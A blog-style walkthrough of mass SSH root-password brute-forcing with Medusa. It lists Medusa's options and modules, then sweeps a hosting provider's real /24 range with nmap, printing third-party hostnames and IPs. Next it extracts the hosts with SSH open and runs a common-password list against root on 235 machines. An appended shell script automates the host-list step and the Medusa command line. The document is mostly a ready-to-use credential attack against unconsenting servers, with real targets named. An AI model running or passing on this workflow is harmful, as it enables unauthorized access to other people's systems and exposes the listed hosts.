A quick write-up. medusa is fairly fast at brute-forcing. First, let's look at the help output.
root@perl-exploit:/pentest/exploits/framework3# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ALERT: Host information must be supplied.
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
  -h [TEXT]    : Target hostname or IP address
  -H [FILE]    : File containing target hostnames or IP addresses
  -u [TEXT]    : Username to test
  -U [FILE]    : File containing usernames to test
  -p [TEXT]    : Password to test
  -P [FILE]    : File containing passwords to test
  -C [FILE]    : File containing combo entries. See README for more information.
  -O [FILE]    : File to append log information to
  -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)
  -M [TEXT]    : Name of the module to execute (without the .mod extension)
  -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
                 different parameter each time and they will all be sent to the module (i.e.
                 -m Param1 -m Param2, etc.)
  -d           : Dump all known modules
  -n [NUM]     : Use for non-default TCP port number
  -s           : Enable SSL
  -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
  -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
  -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
  -t [NUM]     : Total number of logins to be tested concurrently
  -T [NUM]     : Total number of hosts to be tested concurrently
  -L           : Parallelize logins using one username per thread. The default is to process
                 the entire username before proceeding.
  -f           : Stop scanning host after first valid username/password found.
  -F           : Stop audit after first valid username/password found on any host.
  -b           : Suppress startup banner
  -q           : Display module's usage information
  -v [NUM]     : Verbose level [0 - 6 (more)]
  -w [NUM]     : Error debug level [0 - 10 (more)]
  -V           : Display version
  -Z [NUM]     : Resume scan from host #
OK, let's see which modules medusa ships with and what each one can brute-force.
root@perl-exploit:/pentest/exploits/framework3# medusa -d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
  Available modules in ".":
  Available modules in "/usr/lib/medusa/modules":
    + cvs.mod : Brute force module for CVS sessions : version 1.0.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
    + http.mod : Brute force module for HTTP : version 1.3.0
    + imap.mod : Brute force module for IMAP sessions : version 1.2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
    + mysql.mod : Brute force module for MySQL sessions : version 1.2
    + ncp.mod : Brute force module for NCP sessions : version 1.0.0
    + nntp.mod : Brute force module for NNTP sessions : version 1.0.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
    + pop3.mod : Brute force module for POP3 sessions : version 1.2
    + postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
    + rexec.mod : Brute force module for REXEC sessions : version 1.1.1
    + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
    + rsh.mod : Brute force module for RSH sessions : version 1.0.1
    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
    + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
    + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
    + svn.mod : Brute force module for Subversion sessions : version 1.0.0
    + telnet.mod : Brute force module for telnet sessions : version 1.2.2
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
    + vnc.mod : Brute force module for VNC sessions : version 1.0.1
    + web-form.mod : Brute force module for web forms : version 1.0.0
    + wrapper.mod : Generic Wrapper Module : version 1.0.1
Right, we want to brute-force SSH, so we load the ssh module with -M ssh. Note that the module name is given without the .mod extension.
First we need targets, i.e. machines with SSH exposed. Pick a /24 you are authorized to scan and sweep it for port 22:
root@perl-exploit:/pentest# nmap -sV -p 22 -oG ssh 69.163.190.0/24
Then comes a long wait (version detection is what makes it slow). The options mean: scan the whole /24 for port 22 only (-p 22), probe the service version on any open port (-sV), and write the results in grepable format (-oG) to a file named ssh.
Then we look at the scan results:
root@perl-exploit:/pentest# cat ssh
# Nmap 5.00 scan initiated Tue Jun 22 02:18:28 2010 as: nmap -sV -p 22 -oG ssh 69.163.190.0/24
Host: 69.163.190.1 (ip-69-163-190-1.dreamhost.com)	Ports: 22/closed/tcp//ssh///
Host: 69.163.190.2 (ip-69-163-190-2.dreamhost.com)	Ports: 22/closed/tcp//ssh///
Host: 69.163.190.3 (ip-69-163-190-3.dreamhost.com)	Ports: 22/closed/tcp//ssh///
Host: 69.163.190.4 (dragich.shaggy.dreamhost.com)	Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.5 (myrck.spongebob.dreamhost.com)	Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.6 (apache2-twang.luthor.dreamhost.com)	Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.7 (ps11591.dreamhost.com)	Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.8 (ps10854.dreamhost.com)	Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.9 (rangerjill.com)	Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.10 (ouellette.yogi.dreamhost.com)	Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.11 (psmysql11957.dreamhostps.com)	Ports: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/
Host: 69.163.190.12 (rubeo.yogi.dreamhost.com)	Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.13 (alt-malware.com)	Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Something like that. Now we tidy it up and pull out only the IPs that have SSH open; this is where the grepable -oG format pays off, since every host sits on one line with its IP in the second field:
root@perl-exploit:/pentest# grep 22/open ssh | cut -d " " -f 2 >> ssh1.txt
This pipeline uses cut to take the second space-separated field (the IP); I won't go into cut's usage in detail here. Check the result:
root@perl-exploit:/pentest# cat ssh1.txt
69.163.190.4
69.163.190.5
69.163.190.6
69.163.190.7
69.163.190.8
69.163.190.9
69.163.190.10
69.163.190.11
69.163.190.12
69.163.190.13
69.163.190.14
69.163.190.15
69.163.190.16
69.163.190.17
69.163.190.18
69.163.190.19
69.163.190.22
69.163.190.23
69.163.190.24
69.163.190.25
69.163.190.26
69.163.190.27
69.163.190.28
69.163.190.29
69.163.190.30
69.163.190.31
69.163.190.32
69.163.190.33
69.163.190.34
69.163.190.35
69.163.190.36
69.163.190.37
69.163.190.38
69.163.190.39
69.163.190.40
69.163.190.41
69.163.190.42
69.163.190.43
69.163.190.44
69.163.190.45
69.163.190.46
69.163.190.47
69.163.190.48
69.163.190.49
69.163.190.50
69.163.190.51
69.163.190.52
69.163.190.53
Now it looks like this. Next, grab any wordlist (here p.txt, seven entries) and start brute-forcing the root password over SSH:
root@perl-exploit:/pentest# medusa -H ssh1.txt -u root -P p.txt -M ssh
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: oracle (3 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: tomcat (4 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: postgres (5 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: webmin (6 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: fuckyou (7 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: oracle (3 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: tomcat (4 of 7 complete)
OK, now wait; go do something else in the meantime, and any hits are printed as they are found. For a run this long it is worth adding -O file so successful logins are appended to a log instead of getting lost in the scrollback, -f so medusa moves on from a host once it has a valid password, and a modest -t so you do not hammer a single sshd with bursts of failed logins.
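The whole pipeline above (nmap -oG output, grep/cut to a host list, medusa -H) as one set of shell helpers. This is an added example, not code from the original post: the scan file it writes is constructed sample data in the same grepable format as the cat ssh output above, the IPs are RFC 5737 documentation addresses rather than real targets, and the helper names (write_sample_scan, open_ssh_hosts, build_host_list, medusa_cmdline) and the found.txt log name are my own choices. It also handles two cases the bare grep 22/open does not: a host that has 2222/open but 22/closed, and duplicate lines when several scans are appended to the same file.

```shell
#!/bin/sh
# Added example (not from the original post): turn an nmap -oG file into a
# medusa host list, then print the medusa command line to run against it.

write_sample_scan() {
    # $1: output path. Constructed sample data in nmap grepable format; each
    # Host line is "Host: IP (name)<TAB>Ports: port/state/proto//svc//version/".
    {
        printf '# Nmap 5.00 scan initiated as: nmap -sV -p 22 -oG ssh 192.0.2.0/29\n'
        printf 'Host: 192.0.2.1 (a.example)\tPorts: 22/closed/tcp//ssh///\n'
        printf 'Host: 192.0.2.2 (b.example)\tPorts: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/\n'
        printf 'Host: 192.0.2.3 (c.example)\tPorts: 22/filtered/tcp//ssh///\n'
        printf 'Host: 192.0.2.4 (d.example)\tPorts: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/\n'
        printf 'Host: 192.0.2.5 (e.example)\tPorts: 2222/open/tcp//ssh//OpenSSH 5.1p1 (protocol 2.0)/, 22/closed/tcp//ssh///\n'
        printf '# Nmap done -- 8 IP addresses (5 hosts up) scanned\n'
    } > "$1"
}

open_ssh_hosts() {
    # $1: nmap -oG file. Prints the IP (field 2) of every Host line whose
    # Ports field lists port 22 as open. Anchoring "22/open/" to the start of
    # the Ports field or to the ", " separator between ports keeps 2222/open
    # from matching, which a bare "grep 22/open" would not.
    grep -E '^Host: [0-9.]+ .*(Ports: |, )22/open/' "$1" | cut -d ' ' -f 2
}

build_host_list() {
    # $1: nmap -oG file, $2: host file to feed medusa -H. De-duplicates in
    # case the scan file was appended to more than once. Prints the host count.
    open_ssh_hosts "$1" | sort -u > "$2"
    wc -l < "$2" | tr -d ' '
}

medusa_cmdline() {
    # $1: host file, $2: password file. Prints the command; does not run it.
    # -O appends hits to a log so they survive scrollback, -f stops a host
    # after its first valid password, -t caps concurrent logins per host so a
    # single sshd is not hit with a burst of auth failures.
    printf 'medusa -H %s -u root -P %s -M ssh -O found.txt -f -t 4\n' "$1" "$2"
}

# Usage:
#   write_sample_scan /tmp/ssh && build_host_list /tmp/ssh /tmp/ssh1.txt
#   medusa_cmdline /tmp/ssh1.txt p.txt
```

On a real scan you would skip write_sample_scan and point build_host_list at the file nmap -oG produced; the medusa options in medusa_cmdline are all from the help output at the top of the post.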